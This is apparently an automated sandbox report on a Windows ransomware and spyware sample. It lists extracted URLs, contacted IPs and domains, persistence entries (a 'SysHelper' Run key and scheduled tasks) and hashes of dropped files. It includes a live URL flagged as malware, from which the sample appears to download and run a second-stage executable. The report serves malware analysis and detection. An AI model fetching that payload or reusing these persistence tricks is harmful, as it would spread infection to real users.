                                            https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=Ln0LqSBLhS.exe, 00000006.00000003.277607184.0000000002F30000.00000004.00000001.sdmpfalse
                                              		high
                                              https://www.google.com/chrome/Ln0LqSBLhS.exe, 00000006.00000003.277607184.0000000002F30000.00000004.00000001.sdmp, Ln0LqSBLhS.exe, 00000006.00000003.285900646.0000000002F30000.00000004.00000001.sdmp, Ln0LqSBLhS.exe, 00000006.00000003.285871930.0000000002F30000.00000004.00000001.sdmpfalse
                                                		high
                                                https://www.google.comLn0LqSBLhS.exe, 00000006.00000003.286032182.0000000002F30000.00000004.00000001.sdmp, Ln0LqSBLhS.exe, 00000006.00000003.286325981.0000000002F30000.00000004.00000001.sdmp, Ln0LqSBLhS.exe, 00000006.00000003.306691957.0000000002F30000.00000004.00000001.sdmpfalse
                                                  		high
                                                  https://www.youtube.com/iframe_apiLn0LqSBLhS.exe, 00000006.00000003.290651840.0000000002F30000.00000004.00000001.sdmp, Ln0LqSBLhS.exe, 00000006.00000003.286032182.0000000002F30000.00000004.00000001.sdmpfalse
                                                    		high
                                                    https://play.google.com/store/apps/details?id=com.microsoft.emmx&referrer=utm_source%3DAnaheimUpsellLn0LqSBLhS.exe, 00000006.00000003.283201319.0000000002F30000.00000004.00000001.sdmpfalse
                                                      		high
                                                      https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc13122162a9a46c3b4cbf05ffccde0fLn0LqSBLhS.exe, 00000006.00000003.291331807.0000000002F30000.00000004.00000001.sdmpfalse
                                                        		high
                                                        https://github.com/scottjehl/picturefill/blob/master/Authors.txt;Ln0LqSBLhS.exe, 00000006.00000003.286478907.0000000002F30000.00000004.00000001.sdmpfalse
                                                          		high
                                                          https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpgLn0LqSBLhS.exe, 00000006.00000003.277642079.0000000002F30000.00000004.00000001.sdmpfalse
                                                            		high
                                                            http://scrollmagic.ioLn0LqSBLhS.exe, 00000006.00000003.289927322.0000000002F30000.00000004.00000001.sdmpfalse
                                                              		high
                                                              http://docs.google.com/Ln0LqSBLhS.exe, 00000006.00000003.304562620.0000000002F30000.00000004.00000001.sdmpfalse
                                                                		high
                                                                https://drive.google.com/Ln0LqSBLhS.exe, 00000006.00000003.306008578.0000000002F30000.00000004.00000001.sdmp, Ln0LqSBLhS.exe, 00000006.00000003.304562620.0000000002F30000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=68568119166Ln0LqSBLhS.exe, 00000006.00000003.277607184.0000000002F30000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCee0d4d5fd4424c8390d703b105f82c3Ln0LqSBLhS.exe, 00000006.00000003.291384986.0000000002F30000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      https://we.tl/t-VCW326HOLn0LqSBLhS.exe, 00000006.00000003.359018581.00000000008BE000.00000004.00000001.sdmptrue
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://github.com/krux/postscribe/blob/master/LICENSE.Ln0LqSBLhS.exe, 00000006.00000003.286032182.0000000002F30000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        https://api.2ip.ua/kLn0LqSBLhS.exe, 00000009.00000002.253205865.0000000000877000.00000004.00000020.sdmpfalse
                                                                          		high
                                                                          https://stats.g.doubleclick.net/j/collectLn0LqSBLhS.exe, 00000006.00000003.287674072.0000000002F30000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            http://aka.ms/thirdpartynoticesLn0LqSBLhS.exe, 00000006.00000003.283201319.0000000002F30000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              https://googleads.g.doubleclick.net/pagead/viewthroughconversion/1001175813/?randomLn0LqSBLhS.exe, 00000006.00000003.285900646.0000000002F30000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                http://www.reddit.com/Ln0LqSBLhS.exe, 00000006.00000003.254577459.00000000094C0000.00000004.00000001.sdmpfalse
                                                                                  		high
                                                                                  https://api.2ip.ua/wLn0LqSBLhS.exe, 00000006.00000003.244988384.000000000086D000.00000004.00000001.sdmpfalse
                                                                                    		high
                                                                                    https://www.google.com/tools/feedbackLn0LqSBLhS.exe, 00000006.00000003.306650314.0000000002F30000.00000004.00000001.sdmpfalse
                                                                                      		high
                                                                                      http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#Ln0LqSBLhS.exe, 00000003.00000002.241460701.00000000007B9000.00000004.00000020.sdmp, Ln0LqSBLhS.exe, 00000006.00000003.244988384.000000000086D000.00000004.00000001.sdmp, Ln0LqSBLhS.exe, 00000009.00000003.251012559.000000000089F000.00000004.00000001.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      http://www.ecma-international.org/ecma-262/5.1/#sec-CLn0LqSBLhS.exe, 00000006.00000003.306088128.0000000002F30000.00000004.00000001.sdmp, Ln0LqSBLhS.exe, 00000006.00000003.306210346.0000000002F30000.00000004.00000001.sdmpfalse
                                                                                        		high
                                                                                        https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.pLn0LqSBLhS.exe, 00000006.00000003.306088128.0000000002F30000.00000004.00000001.sdmp, Ln0LqSBLhS.exe, 00000006.00000003.306210346.0000000002F30000.00000004.00000001.sdmpfalse
                                                                                          		high
                                                                                          https://g.live.com/odclientsettings/Prod?OneDriveUpdate=40d6f54575e19c16b4b998b94f1Ln0LqSBLhS.exe, 00000006.00000003.277746847.0000000002F30000.00000004.00000001.sdmpfalse
                                                                                            		high
                                                                                            https://g.live.com/odclientsettings/ProdLn0LqSBLhS.exe, 00000006.00000003.278361077.0000000002F30000.00000004.00000001.sdmpfalse
                                                                                              		high
                                                                                              https://support.google.com/chromecast/troubleshooter/2995236Ln0LqSBLhS.exe, 00000006.00000003.329392428.0000000002F30000.00000004.00000001.sdmp, Ln0LqSBLhS.exe, 00000006.00000003.306610590.0000000002F30000.00000004.00000001.sdmpfalse
                                                                                                		high
                                                                                                https://www.skype.com/en/Ln0LqSBLhS.exe, 00000006.00000003.283201319.0000000002F30000.00000004.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eeeLn0LqSBLhS.exe, 00000006.00000003.283593290.0000000002F30000.00000004.00000001.sdmp, Ln0LqSBLhS.exe, 00000006.00000003.284308231.0000000002F30000.00000004.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    https://googleads.g.doubleclick.net/pagead/viewthroughconversion/978707571/?randomLn0LqSBLhS.exe, 00000006.00000003.290389600.0000000002F30000.00000004.00000001.sdmp, Ln0LqSBLhS.exe, 00000006.00000003.285871930.0000000002F30000.00000004.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      https://payments.google.com/payments/v4/js/integrator.jsLn0LqSBLhS.exe, 00000006.00000003.306258818.0000000002F30000.00000004.00000001.sdmpfalse
                                                                                                        		high
                                                                                                        http://securebiz.org/dl/build2.exe$runLn0LqSBLhS.exe, 00000006.00000003.310170996.000000000086A000.00000004.00000001.sdmptrue
                                                                                                        • Avira URL Cloud: malware
                                                                                                        		unknown
                                                                                                        https://g.live.com/odclientsettings/Prod?OneDriveUpdate=9da9c6f613e3ae17beffc8c99676Ln0LqSBLhS.exe, 00000006.00000003.278740790.0000000002F30000.00000004.00000001.sdmpfalse
                                                                                                          		high
                                                                                                          https://www.google.com;Ln0LqSBLhS.exe, 00000006.00000003.306691957.0000000002F30000.00000004.00000001.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		low
                                                                                                          https://api.2ip.ua/geo.json?KLn0LqSBLhS.exe, 00000009.00000002.253127471.0000000000828000.00000004.00000020.sdmpfalse
                                                                                                            		high
                                                                                                            https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1Ln0LqSBLhS.exe, 00000006.00000003.277642079.0000000002F30000.00000004.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              https://play.google.com/store/apps/details?id=com.chrome.betaLn0LqSBLhS.exe, 00000006.00000003.286144680.0000000002F30000.00000004.00000001.sdmpfalse
                                                                                                                		high
                                                                                                                https://api.2ip.ua/geo.jsonkLn0LqSBLhS.exe, 00000009.00000002.253179888.0000000000849000.00000004.00000020.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://github.com/douglascrockford/JSON-jsLn0LqSBLhS.exe, 00000006.00000003.274064401.00000000099D0000.00000004.00000001.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://play.google.com/store/apps/details?id=com.android.chromeLn0LqSBLhS.exe, 00000006.00000003.286144680.0000000002F30000.00000004.00000001.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://g.live.com/1rewlive5skydrive/OneDriveProduction?OneDriveUpdate=161af8ef89eb5a3baf386d6a4f1Ln0LqSBLhS.exe, 00000006.00000003.277846655.0000000002F30000.00000004.00000001.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://www.google.com/intl/en_pk/Ln0LqSBLhS.exe, 00000006.00000003.284670300.0000000002F30000.00000004.00000001.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://api.2ip.ua/geo.json/KLn0LqSBLhS.exe, 00000009.00000002.253179888.0000000000849000.00000004.00000020.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC828bc1cde9f04b788c98b5423157734Ln0LqSBLhS.exe, 00000006.00000003.286783299.0000000002F30000.00000004.00000001.sdmp, Ln0LqSBLhS.exe, 00000006.00000003.283593290.0000000002F30000.00000004.00000001.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://g.live.com/odclientsettings/Prod?OneDriveUpdate=346a40d59e67b656d7ac36dd216Ln0LqSBLhS.exe, 00000006.00000003.277923079.0000000002F30000.00000004.00000001.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://www.onenote.com/Ln0LqSBLhS.exe, 00000006.00000003.283201319.0000000002F30000.00000004.00000001.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://www.opensource.org/licenses/mit-license.php)Ln0LqSBLhS.exe, 00000006.00000003.274064401.00000000099D0000.00000004.00000001.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://www.google.%/ads/ga-audiencesLn0LqSBLhS.exe, 00000006.00000003.287674072.0000000002F30000.00000004.00000001.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    		low
                                                                                                                                    http://crt.sectigo.com/SectigoRSADomainVLn0LqSBLhS.exe, 00000006.00000003.244988384.000000000086D000.00000004.00000001.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    		unknown
                                                                                                                                    https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674Ln0LqSBLhS.exe, 00000006.00000003.277607184.0000000002F30000.00000004.00000001.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://api.2ip.ua/geo.json7Ln0LqSBLhS.exe, 00000006.00000003.244988384.000000000086D000.00000004.00000001.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://www.youtube.com/Ln0LqSBLhS.exe, 00000006.00000003.254653052.00000000094C0000.00000004.00000001.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://api.2ip.ua/geo.json1Ln0LqSBLhS.exe, 00000009.00000002.253179888.0000000000849000.00000004.00000020.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://twitter.com/microsoftedgeLn0LqSBLhS.exe, 00000006.00000003.283201319.0000000002F30000.00000004.00000001.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=02GoogleLn0LqSBLhS.exe, 00000006.00000003.277607184.0000000002F30000.00000004.00000001.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://schema.org/OrganizationLn0LqSBLhS.exe, 00000006.00000003.283201319.0000000002F30000.00000004.00000001.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://www.microsoftedgeinsider.comLn0LqSBLhS.exe, 00000006.00000003.283201319.0000000002F30000.00000004.00000001.sdmpfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  		unknown
                                                                                                                                                  https://g.live.com/odclientsettings/Prod?OneDriveUpdate=863257002496bb1d95dfbe163bc2Ln0LqSBLhS.exe, 00000006.00000003.277846655.0000000002F30000.00000004.00000001.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://docs.google.comLn0LqSBLhS.exe, 00000006.00000003.306960917.0000000002F30000.00000004.00000001.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://fonts.google.com/license/googlerestrictedLn0LqSBLhS.exe, 00000006.00000003.283120255.0000000002F30000.00000004.00000001.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://www.google.com/Ln0LqSBLhS.exe, 00000006.00000003.284670300.0000000002F30000.00000004.00000001.sdmp, Ln0LqSBLhS.exe, 00000006.00000003.306258818.0000000002F30000.00000004.00000001.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://feedback.googleusercontent.comLn0LqSBLhS.exe, 00000006.00000003.306691957.0000000002F30000.00000004.00000001.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://adservice.google.com/ddm/regclkLn0LqSBLhS.exe, 00000006.00000003.286032182.0000000002F30000.00000004.00000001.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://clients6.google.comLn0LqSBLhS.exe, 00000006.00000003.307015871.0000000002F30000.00000004.00000001.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC929a5d988f01430b8db16b1888926c4Ln0LqSBLhS.exe, 00000006.00000003.283593290.0000000002F30000.00000004.00000001.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/DownlLn0LqSBLhS.exe, 00000006.00000003.288850523.0000000002F30000.00000004.00000001.sdmpfalse
                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                  		unknown
                                                                                                                                                                  http://securebiz.org/dl/build2.exerunLn0LqSBLhS.exe, 00000006.00000003.310170996.000000000086A000.00000004.00000001.sdmptrue
                                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                                  		unknown
                                                                                                                                                                  https://dl.google.comLn0LqSBLhS.exe, 00000006.00000003.286144680.0000000002F30000.00000004.00000001.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://www.google.com/intl/en_pk/chrome/Ln0LqSBLhS.exe, 00000006.00000003.284670300.0000000002F30000.00000004.00000001.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://docs.google.com/presentation?usp=chrome_app&authuser=0Ln0LqSBLhS.exe, 00000006.00000003.304295613.0000000002F30000.00000004.00000001.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        http://ocsp.sectigo.com0Ln0LqSBLhS.exe, 00000003.00000002.241460701.00000000007B9000.00000004.00000020.sdmp, Ln0LqSBLhS.exe, 00000006.00000003.244988384.000000000086D000.00000004.00000001.sdmp, Ln0LqSBLhS.exe, 00000009.00000003.251012559.000000000089F000.00000004.00000001.sdmpfalse
                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                        		unknown
                                                                                                                                                                        https://www.google.com/travel/flights/click/conversion/Ln0LqSBLhS.exe, 00000006.00000003.286325981.0000000002F30000.00000004.00000001.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://www.google.com/chrome/static/images/favicons/favicon-16x16.pngLn0LqSBLhS.exe, 00000006.00000003.277558843.0000000002F30000.00000004.00000001.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://geolocation.onetrust.com/cookieconsentpub/v1/geo/locationLn0LqSBLhS.exe, 00000006.00000003.287357715.0000000002F30000.00000004.00000001.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              http://www.amazon.com/Ln0LqSBLhS.exe, 00000006.00000003.254456470.00000000094C0000.00000004.00000001.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://products.office.com/en-us/academic/compare-office-365-education-plansLn0LqSBLhS.exe, 00000006.00000003.283201319.0000000002F30000.00000004.00000001.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://sandbox.google.com/payments/v4/js/integrator.jsLn0LqSBLhS.exe, 00000006.00000003.306258818.0000000002F30000.00000004.00000001.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    http://www.twitter.com/Ln0LqSBLhS.exe, 00000006.00000003.254618926.00000000094C0000.00000004.00000001.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5feba608107a43f986dad18aa360422Ln0LqSBLhS.exe, 00000006.00000003.283593290.0000000002F30000.00000004.00000001.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCfd484f9188564713bbc5d13d862ebbfLn0LqSBLhS.exe, 00000006.00000003.286810902.0000000002F30000.00000004.00000001.sdmp, Ln0LqSBLhS.exe, 00000006.00000003.283593290.0000000002F30000.00000004.00000001.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://mail.google.com/mailLn0LqSBLhS.exe, 00000006.00000003.306327466.0000000002F30000.00000004.00000001.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            http://www.openssl.org/support/faq.htmlLn0LqSBLhS.exe, 00000009.00000002.251711400.0000000000400000.00000040.00000001.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://docs.google.com/document?usp=chrome_app&authuser=0Ln0LqSBLhS.exe, 00000006.00000003.304457957.0000000002F30000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://drive.google.com/drive/settingsLn0LqSBLhS.exe, 00000006.00000003.304562620.0000000002F30000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  http://crl.comoLn0LqSBLhS.exe, 00000009.00000003.251012559.000000000089F000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                  https://g.live.com/1rewlive5skydrive/OneDriveProduction?OneDriveUpdate=c5f7d52e564ba865fbef402f925aLn0LqSBLhS.exe, 00000006.00000003.277796829.0000000002F30000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                    		high

                                                                                                                                                                                                    Contacted IPs

                                                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                                                    • 75% < No. of IPs

                                                                                                                                                                                                    Public

                                                                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                    77.123.139.190
                                                                                                                                                                                                    		api.2ip.uaUkraine
                                                                                                                                                                                                    		25229VOLIA-ASUAfalse
                                                                                                                                                                                                    203.228.9.102
                                                                                                                                                                                                    		securebiz.orgKorea Republic of
                                                                                                                                                                                                    		4766KIXS-AS-KRKoreaTelecomKRfalse
                                                                                                                                                                                                    94.190.187.102
                                                                                                                                                                                                    		astdg.topBulgaria
                                                                                                                                                                                                    		12796TCV-ASBGfalse

                                                                                                                                                                                                    Private

                                                                                                                                                                                                    IP
                                                                                                                                                                                                    192.168.2.1

                                                                                                                                                                                                    General Information

                                                                                                                                                                                                    Joe Sandbox Version:33.0.0 White Diamond
                                                                                                                                                                                                    Analysis ID:473798
                                                                                                                                                                                                    Start date:30.08.2021
                                                                                                                                                                                                    Start time:10:13:09
                                                                                                                                                                                                    Joe Sandbox Product:CloudBasic
                                                                                                                                                                                                    Overall analysis duration:0h 14m 52s
                                                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                                                    Report type:full
                                                                                                                                                                                                    Sample file name:Ln0LqSBLhS.exe
                                                                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                                                                    Number of analysed new started processes analysed:33
                                                                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                                                                    Technologies:
                                                                                                                                                                                                    • HCA enabled
                                                                                                                                                                                                    • EGA enabled
                                                                                                                                                                                                    • HDC enabled
                                                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                                                    Detection:MAL
                                                                                                                                                                                                    Classification:mal100.rans.spyw.evad.winEXE@32/1411@6/4
                                                                                                                                                                                                    EGA Information:Failed
                                                                                                                                                                                                    HDC Information:
                                                                                                                                                                                                    • Successful, ratio: 0.2% (good quality ratio 0.2%)
                                                                                                                                                                                                    • Quality average: 85.5%
                                                                                                                                                                                                    • Quality standard deviation: 14.5%
                                                                                                                                                                                                    HCA Information:
                                                                                                                                                                                                    • Successful, ratio: 89%
                                                                                                                                                                                                    • Number of executed functions: 68
                                                                                                                                                                                                    • Number of non-executed functions: 151
                                                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                                                    • Adjust boot time
                                                                                                                                                                                                    • Enable AMSI
                                                                                                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                                                                                                    Warnings:
                                                                                                                                                                                                    Show All
                                                                                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 23.211.6.115, 23.211.4.86
                                                                                                                                                                                                    • Excluded domains from analysis (whitelisted): e12564.dspb.akamaiedge.net, fs.microsoft.com, store-images.s-microsoft.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net
                                                                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                    • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                    • Report size getting too big, too many NtReadFile calls found.
                                                                                                                                                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                    • Report size getting too big, too many NtWriteFile calls found.

                                                                                                                                                                                                    Simulations

                                                                                                                                                                                                    Behavior and APIs

                                                                                                                                                                                                    TimeTypeDescription
                                                                                                                                                                                                    10:14:15Task SchedulerRun new task: Time Trigger Task path: C:\Users\user\AppData\Local\b6f888d4-cc05-4e6a-87b2-00fd6ab00749\Ln0LqSBLhS.exe s>--Task
                                                                                                                                                                                                    10:14:18AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\b6f888d4-cc05-4e6a-87b2-00fd6ab00749\Ln0LqSBLhS.exe" --AutoStart
                                                                                                                                                                                                    10:14:19API Interceptor1x Sleep call for process: Ln0LqSBLhS.exe modified
                                                                                                                                                                                                    10:14:28AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\b6f888d4-cc05-4e6a-87b2-00fd6ab00749\Ln0LqSBLhS.exe" --AutoStart
                                                                                                                                                                                                    10:14:36Task SchedulerRun new task: Azure-Update-Task path: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe

                                                                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                                                                    IPs

                                                                                                                                                                                                    No context

                                                                                                                                                                                                    Domains

                                                                                                                                                                                                    No context

                                                                                                                                                                                                    ASN

                                                                                                                                                                                                    No context

                                                                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                                                                    No context

                                                                                                                                                                                                    Dropped Files

                                                                                                                                                                                                    No context

                                                                                                                                                                                                    Created / dropped Files

                                                                                                                                                                                                    C:\SystemID\PersonalID.txt
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):42
                                                                                                                                                                                                    Entropy (8bit):4.671730220243275
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:fiOxB835RgtXu7v:fi75d7v
                                                                                                                                                                                                    MD5:FAD888B8ADDAF17CAE8D635433D6A396
                                                                                                                                                                                                    SHA1:06A2EABE2C05AD3C5EEF1AB118F3BF9D604EC5C2
                                                                                                                                                                                                    SHA-256:8AE7280776DD67ADB62121C0648F8A299879CA3390A23374B5AD60604C2E0034
                                                                                                                                                                                                    SHA-512:0E518C08AACCD4E1184DA24458A3BDFC3B7F3240F3DA170C8E18EAD597DDB4AE5037692C2CF179509508FB54ED0AC270389135F664E73000FCD8A820F0892888
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: 5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB..
                                                                                                                                                                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:COM executable for DOS
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):618
                                                                                                                                                                                                    Entropy (8bit):7.585965753574691
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:ikt9mY2QJrHTsc35kaNPta71PzC+oW+GnHlRk18LJ8trWIoH4Ucii9a:fmQ7gOkaNc7JzC+oWdHlRka4UbD
                                                                                                                                                                                                    MD5:14776284652A1A72F0179398AE6B956D
                                                                                                                                                                                                    SHA1:3C39376484AD85741AB5079364C5A0EE1C327E8D
                                                                                                                                                                                                    SHA-256:6FB8F57F8F20727EFB7ADC44E143F90EBDC4A7E1CB0BB64120EFF536D3D35C51
                                                                                                                                                                                                    SHA-512:AF5BFB4AB0CCAEC3567B354A5CFA1D1DD3AD3E07DA3EBFE22E5E634E5F3CE95ED20DC8C58227D9B6FED9D5BFB9AFCAA54E5C9896B14D0A80CE340D67D20B6CD3
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ....U..Jg.?.._,8;....Hb^s.P..ru..s...dE...EU%w9.-).m`.Q...V.W....+.....J.....!.7....@..Be..O..?...>...88...I.o.....o~<.p......(...N5.A.......6-...|.u.W....H....1......8#.`...$3FL...t....#l..T2C)...Z...R..t......WK.)a...g..di....hA..L.M...-..t...eU[.....{.@..m....".....Z.E..(R:.V....1N...h&v.kMy!...@......{.I...k.J./.....$..V.....)....v...<....P.........M.m......7..{.{M.Bi....c.V.Ue.q..`.V...ms..cy.n./.P..M.}.Wh8.>....EO..x....bt.K@..x.%{.4.........9Q.g.v.M....A..=.p.I...[#]@........W..%...{_&..N..:..>...(5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\2EM0SFDW\www.msn[1].xml
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):342
                                                                                                                                                                                                    Entropy (8bit):7.151691212334702
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:s+UCHf7KEkEjLlWzgG/4qm6phrXVY/svJkxUvJckZN/QzH75dExcii96Z:s+HHf7KETLl04qm6XFSsCxUvJckrQwcq
                                                                                                                                                                                                    MD5:6580648BFA08C49081D16DDBA2358F83
                                                                                                                                                                                                    SHA1:11B13DD1648787479836CFE9AB142664D8CC60B9
                                                                                                                                                                                                    SHA-256:C7974C9E1FC052990AAB73CF09A42D4EBE46ECBD573A4468A7BB7082CEF2C8DA
                                                                                                                                                                                                    SHA-512:20F38716F6CDA482A5F50E2DCFB18F26CE18AEDFCEB444F75950F021D43117AF206F6526125136712D282CE5BC5BE3EE4A95B9990514D68D7D6B8995B481D841
                                                                                                                                                                                                    Malicious:false
